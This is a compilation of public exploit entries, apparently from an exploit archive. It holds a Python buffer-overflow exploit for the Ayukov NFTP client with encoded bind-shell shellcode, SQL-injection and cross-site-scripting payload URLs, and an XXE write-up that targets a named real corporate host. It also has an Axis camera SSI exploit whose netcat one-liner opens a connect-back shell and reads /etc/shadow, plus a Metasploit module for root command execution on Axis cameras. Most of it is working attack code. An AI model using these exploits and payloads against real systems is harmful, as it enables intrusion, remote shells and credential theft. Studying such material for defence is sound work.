
# Exploit Title: Ayukov NFTP client 1.71 -  'SYST' Buffer Overflow
# Date: 2019-11-03
# Exploit Author: Chase Hatch (SYANiDE)
# Vendor Homepage: http://ayukov.com/nftp/
# Software Link: ftp://ftp.ayukov.com/pub/nftp/nftp-1.71-i386-win32.exe
# Version: 1.71
# Tested on: Windows XP Pro SP0, SP1, SP2, SP3
# CVE : https://nvd.nist.gov/vuln/detail/CVE-2017-15222
# Steps to reproduce:
# Run the server with the valid Windows version
# Connect the client to the malicious server
# bind shell on port 5150

#!/usr/bin/env python2
import os, sys, socket

NARGS = len(sys.argv)  # argument count; exactly one positional argument (the target version key) is expected

# ntdll.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes)
# kernel32.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes)
# 7C923A95   FFD6  CALL ESI  	# Windows XP Pro SP3; ntdll.dll
# 7C927543   FFD6  CALL ESI		# Windows XP Pro SP2; ntdll.dll
# 77E641C7   FFE6  JMP ESI		# Windows XP Pro SP1; kernel32.dll
# 77E667F3   FFE6  JMP ESI		# Windows XP Pro SP0: kernel32.dll
#
# Return address per target build, keyed by the exact version string passed as
# argv[1]. Each value is the little-endian byte form of the address listed in
# the table above (e.g. 7C923A95 -> "\x95\x3A\x92\x7c"). The flag notes above
# record why the author could use fixed addresses in these system DLLs: the
# listed XP builds ship them without ASLR or DEP, which is the mitigation that
# would otherwise defeat a static return address like this.
tourRETs = {
	"XPProSP3": "\x95\x3A\x92\x7c",
	"XPProSP2": "\x43\x75\x92\x7C",
	"XPProSP1": "\xc7\x41\xe6\x77",
	"XPProSP0": "\xf3\x67\xe6\x77"
}


# Usage guard: without a version argument, print the accepted keys and exit 1.
if NARGS <= 1:
	print("USAGE: %s version" % sys.argv[0])
	print("[.] version must be in:")
	for version_name in tourRETs:
		print("\t%s" % version_name)
	sys.exit(1)


# sploit = "A"*5000  # crash!  in SYST cmd, 41414141 in EIP and EBP
# ESP and ESI both pointers to somewhere in the As
#  If I increase the overflow string to 10000, the area ESP points to at crash
#, goes from 864 bytes of uninterrupted \x41's to roughly 4056 bytes.
# sploit = "A"*10000
# sploit = sys.argv[1]  # $(`locate pattern_create.rb|head -n 1` 10000) # 46326846 in EIP
# `locate pattern_offset.rb |head -n 1` 46326846 10000  # 4116
#
# Buffer layout, first segment: 4116 filler bytes, the offset at which the
# client's handling of the SYST reply overwrites its saved return address
# (measured by the author with pattern_create/pattern_offset, notes above).
# The underlying defect appears to be the client copying the server's SYST
# reply into a fixed-size buffer with no length check (inferred from the
# crash notes; the fix is on the client side).
sploit = "A"*4116

# Add the return address
# Next 4 bytes: the return address selected by argv[1] from tourRETs. An
# unknown key is reported and the script exits with status 1. Python 2
# syntax (`except KeyError, x`); this file does not run under Python 3.
try:
	sploit +=  tourRETs[sys.argv[1]]
except KeyError, x:
	print("[!] Version %s: not a valid version!  Possibly bad capitalization" % str(x))
	sys.exit(1)

sploit += ("\x90"*12)  # original calcs based on RET*4... oops. realign.  (12 NOPs; the author notes this corrects an earlier miscount)

# echo "ibase=16;obase=10;0247CED1 - 0247C834" |bc  # 0x69D (1693); ESP-ESI
sploit += "\x90"*1693 # leaves 16 nops at jmp/call target before Cs  (NOP run sized to the ESP-ESI distance seen at the crash, 0x69D)


# badchars = "\x00\x0a\x0d"
# locate EIP and align ESP to a close future 4 and 16 byte boundary
#
# Author's disassembly of the 21-byte stub appended right after this string.
# FSTENV stores the FPU environment at ESP-0xC, which includes the address of
# the preceding FLDZ, so POP ECX yields that address; the ADDs (0x09+0x04+0x2A
# to CL, 0x01 to CH) move ECX forward, and PUSH ECX / POP ESP relocates the
# stack pointer there. NOTES is informational only; it is not sent.
NOTES = """\
$-37     > D9EE             FLDZ
$-35     > D97424 F4        FSTENV (28-BYTE) PTR SS:[ESP-C]
$-31     > 59               POP ECX
$-30     > 80C1 09          ADD CL,9
$-2D     > 80C1 04          ADD CL,4
$-2A     > 80C1 2A          ADD CL,2A
$-27     > 80C5 01          ADD CH,1
$-24     > 51               PUSH ECX
$-23     > 5C               POP ESP
"""
sploit += "\xD9\xEE\xD9\x74\x24\xF4\x59\x80\xc1\x09\x80\xc1\x04" #13 bytes  (FLDZ / FSTENV / POP ECX / ADD CL,9 / ADD CL,4)
sploit += "\x80\xc1\x2a\x80\xc5\x01\x51\x5c" # 8 bytes  (ADD CL,2A / ADD CH,1 / PUSH ECX / POP ESP)
sploit += "\x90" * 0x22  # ESP = EIP  (34 NOPs)
sploit += "\x90" * 20  # sled for shikata_ga_nai unpack  (the decoder below writes to the stack, hence the realignment above)

# msfvenom -p windows/shell_bind_tcp LPORT=5150 EXITFUNC=process 
# -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -i 1 -f c
# Payload: msfvenom windows/shell_bind_tcp, LPORT 5150, one shikata_ga_nai
# pass to avoid the three bad bytes listed above. Defensive note: the
# observable post-exploitation effect on the victim host is the FTP client
# process listening on TCP 5150 (the LPORT in the msfvenom command).
sploit += (
"\xba\xd2\xe1\x61\xb1\xdb\xc6\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
"\x53\x83\xeb\xfc\x31\x53\x0e\x03\x81\xef\x83\x44\xd9\x18\xc1"
"\xa7\x21\xd9\xa6\x2e\xc4\xe8\xe6\x55\x8d\x5b\xd7\x1e\xc3\x57"
"\x9c\x73\xf7\xec\xd0\x5b\xf8\x45\x5e\xba\x37\x55\xf3\xfe\x56"
"\xd5\x0e\xd3\xb8\xe4\xc0\x26\xb9\x21\x3c\xca\xeb\xfa\x4a\x79"
"\x1b\x8e\x07\x42\x90\xdc\x86\xc2\x45\x94\xa9\xe3\xd8\xae\xf3"
"\x23\xdb\x63\x88\x6d\xc3\x60\xb5\x24\x78\x52\x41\xb7\xa8\xaa"
"\xaa\x14\x95\x02\x59\x64\xd2\xa5\x82\x13\x2a\xd6\x3f\x24\xe9"
"\xa4\x9b\xa1\xe9\x0f\x6f\x11\xd5\xae\xbc\xc4\x9e\xbd\x09\x82"
"\xf8\xa1\x8c\x47\x73\xdd\x05\x66\x53\x57\x5d\x4d\x77\x33\x05"
"\xec\x2e\x99\xe8\x11\x30\x42\x54\xb4\x3b\x6f\x81\xc5\x66\xf8"
"\x66\xe4\x98\xf8\xe0\x7f\xeb\xca\xaf\x2b\x63\x67\x27\xf2\x74"
"\x88\x12\x42\xea\x77\x9d\xb3\x23\xbc\xc9\xe3\x5b\x15\x72\x68"
"\x9b\x9a\xa7\x05\x93\x3d\x18\x38\x5e\xfd\xc8\xfc\xf0\x96\x02"
"\xf3\x2f\x86\x2c\xd9\x58\x2f\xd1\xe2\x72\xae\x5c\x04\x10\xde"
"\x08\x9e\x8c\x1c\x6f\x17\x2b\x5e\x45\x0f\xdb\x17\x8f\x88\xe4"
"\xa7\x85\xbe\x72\x2c\xca\x7a\x63\x33\xc7\x2a\xf4\xa4\x9d\xba"
"\xb7\x55\xa1\x96\x2f\xf5\x30\x7d\xaf\x70\x29\x2a\xf8\xd5\x9f"
"\x23\x6c\xc8\x86\x9d\x92\x11\x5e\xe5\x16\xce\xa3\xe8\x97\x83"
"\x98\xce\x87\x5d\x20\x4b\xf3\x31\x77\x05\xad\xf7\x21\xe7\x07"
"\xae\x9e\xa1\xcf\x37\xed\x71\x89\x37\x38\x04\x75\x89\x95\x51"
"\x8a\x26\x72\x56\xf3\x5a\xe2\x99\x2e\xdf\x12\xd0\x72\x76\xbb"
"\xbd\xe7\xca\xa6\x3d\xd2\x09\xdf\xbd\xd6\xf1\x24\xdd\x93\xf4"
"\x61\x59\x48\x85\xfa\x0c\x6e\x3a\xfa\x04"
) # 355  (23 lines of 15 bytes + 10 = 355 bytes)
# Trailing filler so the whole SYST reply is exactly 10000 bytes
# (the sum of every segment above is 6255, leaving 3745 'C's).
sploit += "C" * (10000 - 4116 - 4 - 12 - 1693 - 13 - 8 - 0x22 - 355 - 20)


# Canned replies, keyed by the FTP command substring the server looks for in
# each request (see the serving loop below). Everything except "SYST" is a
# short, plausible status line so the client continues its normal command
# sequence; "SYST" is answered with the 10000-byte `sploit` buffer instead of
# the usual "215 UNIX Type: L8". From the client's point of view, the anomaly
# is a SYST reply thousands of bytes long where a one-line 215 is expected.
cases = {
	"USER": "331 user OK. Pass required",
	"PASS": "230 OK, current directory is /",
	# "SYST": "215 UNIX Type: L8",

	"SYST": sploit,		# CRASH! in response to SYST cmd/request, w/"A"*5000, 41414141 in EIP and EBP

	"TYPE": "200 TYPE is whatever was just requested... \"yeah, ok\"",
	"SITE UMASK": "500 SITE UMASK is an unknown extension",
	"CWD": "250 OK, current directory whatever you think it is",
	"PORT": "200 PORT command successful",
	"PASV": "227 Entering PASV mode",
	"LIST": "150 Connecting to whatever port.\r\n226 ASCII\r\n226 Options: -a -l\r\n226 3 matches total"
}


# Minimal fake FTP server ("HostileFTPd"). It binds a hard-coded lab address
# on port 21, accepts a single client, sends a 220 banner, then answers each
# received command by substring-matching it against `cases`. Python 2 only:
# sockets are written with str, and raw_input is used below.
sx = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sx.bind(("192.168.56.181",21))  # author's test-network address; port 21 needs privileges to bind on most systems
sx.listen(5)
print("[.] Standing up HostileFTPd v0.0 alpha, port 21")
cx,addr = sx.accept()  # blocks until one client connects; only that connection is ever served
print("[!] Connection received from %s" % str(addr))
cx.send("220 HostileFTPd v0.0 alpha !\r\n")
notified = 0  # flipped to 1 once "SITE UMASK" is seen, i.e. the client survived past the SYST reply
while True:	
	req = cx.recv(1024)  # one request chunk; nothing breaks the loop on disconnect (recv returning ""), so it spins
	for key, resp in cases.items():
		if key in req:  # substring match against the raw request text
			cx.send(resp + "\r\n")
		# NOTE: the two checks below sit inside the per-key loop, so they are
		# evaluated once per `cases` entry for every request; `notified`
		# guards the first, the second prompts on every iteration.
		if "SITE UMASK" in req and notified == 0:
			print("[!]  Buffer sent.  Bind shell on client's port 5150?")
			notified = 1
		if "PASV" in req:
			justpause = raw_input("[.] PASV received.  Pausing recv buffer")


# Reference transcript of a normal NFTP client session against a real
# Pure-FTPd server (captured by following the TCP stream). The canned replies
# in `cases` imitate this exchange. This rebinds NOTES and is never used at
# runtime; it is kept as documentation of the expected command order.
NOTES="""\
### followed TCP stream in normal client connect to ftp server
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 13:47. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
USER bozo
331 User bozo OK. Password required
PASS theclown
230-User bozo has group access to:  1003      
230 OK. Current directory is /
SYST
215 UNIX Type: L8
TYPE I
200 TYPE is now 8-bit binary
SITE UMASK 022
500 SITE UMASK is an unknown extension
CWD /
250 OK. Current directory is /
PASV
227 Entering Passive Mode (192,168,56,181,183,29)
LIST -a
150 Accepted data connection
226-ASCII
226-Options: -a -l 
226 3 matches total
"""
            
source: https://www.securityfocus.com/bid/49668/info

Multiple Ay Computer products are prone to multiple SQL-injection vulnerabilities because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/v1/urundetay.asp?id=21%28%29

http://www.example.com/v1/default.asp?getir=urunler&id=39%28%29

http://www.example.com/v1/linkler.asp?id=2%28%29

http://www.example.com/detay.asp?ilanid=8%28%29 [SQL]

http://www.example.com/kategoriler.asp?id=4%28%29 [SQL]

http://www.example.com/link.asp?page=referanslarimiz&id=2%28%29 [SQL]

http://www.example.com/?catid=23+union+select+0,1,2,3,4,5+from+admin 
            
# Title: Axway SecureTransport 5 - Unauthenticated XML Injection
# Google Dork: intitle:"Axway SecureTransport" "Login"
# Date: 2019-07-20
# Author: Dominik Penner / zer0pwn of Underdog Security
# Vendor Homepage: https://www.axway.com/en
# Software Link: https://docs.axway.com/bundle/SecureTransport_54_AdministratorGuide_allOS_en_HTML5/page/Content/AdministratorsGuide/overview/overview.htm
# Version: 5.x
# CVE: N/A
				                     _       _ 
				  _______ _ __ ___  | | ___ | |
				 |_  / _ \ '__/ _ \ | |/ _ \| |
				  / /  __/ | | (_) || | (_) | |
				 /___\___|_|  \___(_)_|\___/|_|
				    	  https://zero.lol
				 	      zero days 4 days


				ATTENTION:

				this is a friendly neighborhood zeroday drop
				                               



"Axway SecureTransport is a multi-protocol MFT gateway for securing, managing, and tracking file flows among people and applications inside your enterprise, and beyond your firewall to your user communities, the cloud and mobile devices. It is designed to handle everything — from high-volume automated high speed secure file transfers between systems, sites, lines of business and external partners, to user-driven communications and mobile, folder- and portal-based file sharing."

Who uses this software?

Well, to name a few... (just use the dork dude)
- Government of California
- Biometrics.mil
- Fleetcor
- Costco
- Boeing
- IRS


Description:
Axway SecureTransport versions 5.3 through 5.0 (and potentially others) are vulnerable to an unauthenticated blind XML injection (& XXE) vulnerability in the resetPassword functionality via the REST API. If executed properly, this vulnerability can lead to local file disclosure, DOS or URI invocation attacks (e.g SSRF->RCE). It's worth noting that in version 5.4 the v1 API was deprecated... but not removed entirely. Meaning that you can still trigger this vulnerability on updated installations if they have the v1.0, v1.1, v1.2 or v1.3 in the /api/ directory.


Reproduction:

1. Breaking the parser.

	HTTP Request:
	```
	POST /api/v1.0/myself/resetPassword HTTP/1.1
	Host: securefile.costco.com
	Content-Type: application/xml
	Referer: localhost

	</email>
	```

	HTTP Response:
	```
	{
	  "message" : "javax.xml.bind.UnmarshalException\n - with linked exception:\n[org.xml.sax.SAXParseException; lineNumber: 1; columnNumber: 2; The markup in the document preceding the root element must be well-formed.]"
	}
	```


2. Verifying the vulnerability.

	HTTP Request:
	```
	POST /api/v1.0/myself/resetPassword HTTP/1.1
	Host: securefile.costco.com
	Content-Type: application/xml
	Referer: localhost

	<?xml version="1.0" encoding="UTF-8" standalone="no"?>
	<!DOCTYPE resetPassword [
	<!ENTITY thisactuallyexists SYSTEM "file:///dev/null">
	]>
	<resetPassword><email>&thisactuallyexists;&thisdoesnt;</email></resetPassword>
	```

	HTTP Response:
	```
	{
	  "message" : "javax.xml.bind.UnmarshalException\n - with linked exception:\n[org.xml.sax.SAXParseException; lineNumber: 5; columnNumber: 48; The entity "thisdoesnt" was referenced, but not declared.]"
	}
	```

	As you can see, the parser recognizes that "thisactuallyexists" was in fact declared. In the same error, we see that "thisdoesnt" was referenced, but not declared. This demonstrates that we can declare arbitrary entities.

	https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection#detect-the-vulnerability


3. External Entity Injection (XXE) (hardened)

	NOTE: Because the server doesn't reflect the input anywhere, our only option is error-based XXE or out-of-band XXE. However, upon initial discovery, it appears as though most Axway SecureTransport installations have some type of firewall blocking all outgoing requests. This makes exploiting traditional XXE difficult. Judging by this, my only ideas on exploitation would be via blind SSRF or by repurposing an existing DTD on the filesystem to trigger an error with the file contents/result of our payload. However because I don't have a license, I can't effectively audit this software from a whitebox perspective, which makes mapping out internal attack surface difficult. The underlying vulnerability remains... but with restrictions.

	HTTP Request:
	```
	POST /api/v1.0/myself/resetPassword HTTP/1.1
	Host: securefile.costco.com
	Content-Type: application/xml
	Referer: localhost

	<?xml version="1.0" encoding="UTF-8" standalone="no"?>
	<!DOCTYPE resetPassword [
	<!ENTITY ssrf SYSTEM "http://localhost/SOMETHING_I_WISH_I_KNEW_EXISTED?NEW_PASSWORD=1337" >
	]>
	<resetPassword><email>&ssrf;</email></resetPassword>
	```

	HTTP Response:
	```
	(empty)
	```

	Local DTD repurposing example request:
	```
	POST /api/v1.0/myself/resetPassword HTTP/1.1
	Host: securefile.costco.com
	Content-Type: application/xml
	Referer: localhost

	<?xml version="1.0" encoding="UTF-8" standalone="no"?>
	<!DOCTYPE resetPassword [
	    <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">

	    <!ENTITY % expr 'aaa)>
	        <!ENTITY &#x25; file SYSTEM "file:///FILE_TO_READ">
	        <!ENTITY &#x25; eval "<!ENTITY &#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
	        &#x25;eval;
	        &#x25;error;
	        <!ELEMENT aa (bb'>

	    %local_dtd;
	]>
	<resetPassword></resetPassword>

	```


4. More vulnerability-indicating errors:

	HTTP Request:
	```
	POST /api/v1.0/myself/resetPassword HTTP/1.1
	Host: securefile.costco.com
	Content-Type: application/xml
	Referer: localhost

	<?xml version="1.0" encoding="UTF-8" standalone="no"?>
	<!DOCTYPE resetPassword [
	<!ENTITY ssrf SYSTEM a >
	]>
	<resetPassword><email>&ssrf;</email></resetPassword>
	```

	HTTP Response:
	```
	{
	  "message" : "javax.xml.bind.UnmarshalException\n - with linked exception:\n[org.xml.sax.SAXParseException; lineNumber: 3; columnNumber: 22; The system identifier must begin with either a single or double quote character.]"
	}
	```

5. The original request

	HTTP Request:
	```
	POST /api/v1.0/myself/resetPassword HTTP/1.1
	Host: securefile.costco.com
	Content-Type: application/xml
	Referer: localhost

	<resetPassword><email>email@email.com</email></resetPassword>
	```

	HTTP Response:
	```
	(empty)
	```


Conclusion:

If a determined attacker were to get to know the Axway SecureTransport software, the chances of successfully chaining this bug are high. DTD repurposing is a relatively new technique, however in the near future we will be seeing a lot more of this attack vector due to XML parser restrictions/firewalled networks. I didn't feel comfortable doing further testing as I don't have a license, meaning I'm limited to testing against live targets. So for now, enjoy the 0day. Be creative.


Remediation:

In order to avoid this vulnerability, it's suggested to disable both doctype declaration and external general entities. You can find more information on that here: https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#java


Notes:

- Referer must be set.
- Content type must be xml.
- Successful request returns an HTTP/1.1 204 No Content
- Any type of invalid XML throws a SAXParser exception.
- If external entities were disabled... we should also receive an exception.
- Same with doctype declaration.
- API endpoints can vary from /api/v1.0, /api/v1.1, /api/v1.2, /api/v1.3, /api/v1.4


References:

https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/
https://gist.github.com/marcwickenden/acd0b23953b52e7c1a1a90925862d8e2
https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html
https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation
            
source: https://www.securityfocus.com/bid/55589/info

AxisInternet VoIP Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

AxisInternet VoIP Manager 2.1.5.7 is vulnerable; other versions may also be affected. 

https://www.example.com/asterisk/contacts.cgi?usr=demo-100&type=1&type_selector=2&lastname=&lastname_match=1&firstname=&firstname_match=1&department=%22%3 %3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&department_match=1&action=Select

https://www.example.com/asterisk/contacts.cgi?usr=demo-100&type=1&type_selector=2&lastname=&lastname_match=1&firstname=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&firstname_match=1&department=&department_match=1&action=Select

https://www.example.com/asterisk/contacts.cgi?usr=demo-100&type=1&type_selector=2&;lastname=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&lastname_match=1&firstname=&firstname_match=1&department=&department_match=1&action=Select

https://www.example.com/asterisk/contact_chooser.cgi?contact=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C

https://www.example.com/asterisk/contacts.cgi?type=2&usr=demo-100&managed_usr=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&type_selector=2&lastname=&lastname_match=1&firstname=&firstname_match=1&department=&department_match=1&action=Select+ 
            
[STX]

Subject: SSI Remote Execute and Read Files
Researcher: bashis <mcw noemail eu> (August 2016)
Release date: October, 2017 (Old stuff that I've forgotten, fixed Q3/2016 by Axis)

Attack Vector: Remote
Authentication: Anonymous (no credentials needed)
Conditions: The camera must be configured to allow anonymous viewing

Execute remote commands (PoC: Connect back shell):
echo -en "GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%20<CONNECT BACK IP>%20<CONNECT BACK PORT>%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0\n\n" | ncat <TARGET IP> <TARGET PORT>

Notes:
<CONNECT BACK IP> = LHOST IP
<CONNECT BACK PORT> = LHOST PORT
<TARGET IP> = RHOST IP
<TARGET PORT> RHOST PORT


Read remote files (PoC: Read /etc/shadow - check top of the returned output):
echo -en "GET /incl/image_test.shtml?camnbr=%3c%21--%23include%20virtual=%22../../etc/shadow%22%20--%3e HTTP/1.0\n\n" | ncat <TARGET IP> <TARGET PORT>

Notes:
<TARGET IP> = RHOST IP
<TARGET PORT> RHOST PORT

[ETX]
            
                         _ _ _       _
                        | | | |     | |
  ___  _ ____      _____| | | | __ _| |__  ___
 / _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __|   6079 Smith W
| (_) | |   \ V  V /  __/ | | | (_| | |_) \__ \   doubleplusungood
 \___/|_|    \_/\_/ \___|_|_|_|\__,_|_.__/|___/   owning some telescreens...


 Security Advisory
    2016-04-09
                www.orwelllabs.com
                  twt:@orwelllabs





I. ADVISORY INFORMATION
-----------------------
Title: Axis Network Cameras Multiple Cross-site scripting
Vendor: Axis Communications
Class: Improper Input Validation [CWE-20]
CVE Name: CVE-2015-8256
Remotely Exploitable: Yes
Locally Exploitable: No
OLSA-ID: OLSA-2015-8256
Advisory URL:
http://www.orwelllabs.com/2016/01/axis-network-cameras-multiple-cross.html


II. Background
--------------
Axis is the market leader in network video, invented the world’s first
network camera back in 1996 and we’ve been innovators in video surveillance
ever since. Axis network video products are installed in public places and
areas such as retail chains, airports, trains, motorways, universities,
prisons, casinos and banks.

III. vulnerability
------------------
AXIS Network Cameras are prone to multiple (stored/reflected) cross-site
scripting vulnerabilities.

IV. technical details
---------------------
These attack vectors allow execution of arbitrary JavaScript code in
the user's browser (session) with these steps:

# 1 Attacker injects a javascript payload in the vulnerable page:
http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script
type="text/javascript>prompt("AXIS_PASSWORD:")</script>

This will create an entry in the general log file (/var/log/messages). So,
when the user views the log under 'system options' -> 'support' -> 'Logs &
Reports':

http://{axishost}/axis-cgi/admin/systemlog.cgi?id
a prompt for the password of the current user ('AXIS_PASSWORD') will be
displayed.

However, due to the CSRF described above, it is even possible to perform all the actions
already presented: create, edit and remove users and applications, etc. For
example, to delete the application "axis_update" via SXSS (stored XSS):

http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script src="http://
axishost/axis-cgi/admin/local_del.cgi?+/usr/html/local/viewer/axis_update.shtml"></script>

* A reflected cross-site scripting affects all models of AXIS devices on
the same parameter:
http://
{axis-cam-model}/view/view.shtml?imagePath=0WLL</script><script>alert('AXIS-XSS')</script><!--

# Other Vectors
http://
{axishost}/admin/config.shtml?group=%3Cscript%3Ealert%281%29%3C/script%3E

http://{axishost}/view/custom_whiteBalance.shtml?imagePath=<img src="xs"
onerror=alert(7) /><!--
http://
{axishost}/admin-bin/editcgi.cgi?file=<script>alert('SmithW')</script>

http://
{axishost}/operator/recipient_test.shtml?protocol=%3Cscript%3Ealert%281%29%3C/script%3E

http://
{axishost}/admin/showReport.shtml?content=alwaysmulti.sdp&pageTitle=axis</title></head><body><pre><script>alert(1)</script>

# SCRIPTPATHS:

{HTMLROOT}/showReport.shtml
{HTMLROOT}/config.shtml
{HTMLROOT}/incl/top_incl.shtml
{HTMLROOT}/incl/popup_header.shtml
{HTMLROOT}/incl/page_header.shtml
{HTMLROOT}/incl/top_incl_popup.shtml
{HTMLROOT}/viewAreas.shtml
{HTMLROOT}/vmd.shtml
{HTMLROOT}/custom_whiteBalance.shtml
{HTMLROOT}/playWindow.shtml
{HTMLROOT}/incl/ptz_incl.shtml
{HTMLROOT}/view.shtml
{HTMLROOT}/streampreview.shtml

And many, many others...

V. Impact
---------
Allows running arbitrary code in a victim's browser, and on the computer if combined
with other flaws in the same devices.

VI. Affected products
---------------------
Multiple Axis Network products.

VII. solution
-------------
No solution to the problem was provided.

VIII. Credits
-------------
The vulnerability has been discovered by SmithW from OrwellLabs

IX. Legal Notices
-----------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this
information.

X. Vendor solutions and workarounds
-----------------------------------
There was no response from the vendor.


About Orwelllabs
++++++++++++++++
Orwelllabs is a (doubleplusungood) security research lab interested in embedded
device & webapp hacking.
            
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  #include Msf::Exploit::CmdStager

  # Module metadata. Only one target is active ('Unix In-Memory': a cmd
  # payload delivered inside a parhand parameter value); the 'Linux Dropper'
  # target is disabled with =begin/=end and the CmdStager include is commented
  # out, so execute_cmdstager is never reached. BadChars is a single space,
  # presumably because the payload ends up inside a space-separated dbus-send
  # argument string (see execute_command). The CVEs and the two advisory URLs
  # in References are the vendor/researcher sources for this chain.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Axis Network Camera .srv to parhand RCE',
      'Description'    => %q{
        This module exploits an auth bypass in .srv functionality and a
        command injection in parhand to execute code as the root user.
      },
      'Author'         => [
        'Or Peles',       # Vulnerability discovery (VDOO)
        'wvu',            # Metasploit module
        'sinn3r',         # Metasploit module
        'Brent Cook',     # Metasploit module
        'Jacob Robles',   # Metasploit module
        'Matthew Kienow', # Metasploit module
        'Shelby Pace',    # Metasploit module
        'Chris Lee',      # Metasploit module
        'Cale Black'      # Metasploit module
      ],
      'References'     => [
        ['CVE', '2018-10660'],
        ['CVE', '2018-10661'],
        ['CVE', '2018-10662'],
        ['URL', 'https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/'],
        ['URL', 'https://www.axis.com/files/faq/Advisory_ACV-128401.pdf']
      ],
      'DisclosureDate' => 'Jun 18 2018',
      'License'        => MSF_LICENSE,
      'Platform'       => ['unix'],# 'linux'],
      'Arch'           => [ARCH_CMD],# ARCH_ARMLE],
      'Privileged'     => true,
      'Targets'        => [
        ['Unix In-Memory',
         'Platform'    => 'unix',
         'Arch'        => ARCH_CMD,
         'Type'        => :unix_memory,
         'Payload'     => {
           'BadChars'  => ' ',
           'Encoder'   => 'cmd/ifs',
           'Compat'    => {'PayloadType' => 'cmd', 'RequiredCmd' => 'netcat-e'}
         }
        ],
=begin
        ['Linux Dropper',
         'Platform'    => 'linux',
         'Arch'        => ARCH_ARMLE,
         'Type'        => :linux_dropper
        ]
=end
      ],
      'DefaultTarget'  => 0,
      'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'}
    ))
  end

  # Framework entry point. Dispatches on the selected target's :Type; with
  # only :unix_memory active, the encoded cmd payload goes straight to
  # execute_command. The :linux_dropper branch is disabled (=begin/=end).
  def exploit
    case target['Type']
    when :unix_memory
      execute_command(payload.encoded)
=begin
    when :linux_dropper
      execute_cmdstager
=end
    end
  end

  # Delivers `cmd` to the device in two HTTP POSTs to the same randomly named
  # .srv path under /index.html/ (the .srv handling is the auth-bypass half of
  # the chain per the module description). The first request asks parhand,
  # via a dbus-send argument string, to set root.Time.DST.Enabled to a value
  # that embeds `cmd` between semicolons (the command-injection half); the
  # second calls SynchParameters so parhand acts on the new value.
  # `opts` is accepted (CmdStager-style signature) but unused. Neither
  # response is inspected, so the method reports no failure and returns
  # whatever the second send_request_cgi returns.
  #
  # Defensive note: on the wire this is a POST to /index.html/<random>.srv
  # with form fields action=dbus and args=--system --dest=com.axis.PolicyKitParhand ...;
  # the Axis advisory referenced above (ACV-128401) covers the vendor fix.
  def execute_command(cmd, opts = {})
    rand_srv = "#{Rex::Text.rand_text_alphanumeric(8..42)}.srv"

    send_request_cgi(
      'method'    => 'POST',
      'uri'       => "/index.html/#{rand_srv}",
      'vars_post' => {
        'action'  => 'dbus',
        'args'    => dbus_send(
          method: :set_param,
          param:  "string:root.Time.DST.Enabled string:;#{cmd};"
        )
      }
    )

    send_request_cgi(
      'method'    => 'POST',
      'uri'       => "/index.html/#{rand_srv}",
      'vars_post' => {
        'action'  => 'dbus',
        'args'    => dbus_send(method: :synch_params)
      }
    )
  end

  # Builds the dbus-send argument string for the parhand PolicyKit interface.
  # method: :set_param appends SetParameter followed by `param` verbatim;
  # :synch_params appends SynchParameters with no argument. Any other symbol
  # makes the case expression nil, and `args << nil` raises TypeError.
  # Returns the assembled String.
  def dbus_send(method:, param: nil)
    args = '--system --dest=com.axis.PolicyKitParhand ' \
           '--type=method_call /com/axis/PolicyKitParhand '

    args <<
      case method
      when :set_param
        "com.axis.PolicyKitParhand.SetParameter #{param}"
      when :synch_params
        'com.axis.PolicyKitParhand.SynchParameters'
      end

    args
  end

end
            
source: https://www.securityfocus.com/bid/50968/info

Axis M10 Series Network Cameras are prone to a cross-site scripting vulnerability because they fail to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Axis M1054 firmware 5.21 is vulnerable; other version may also be affected. 

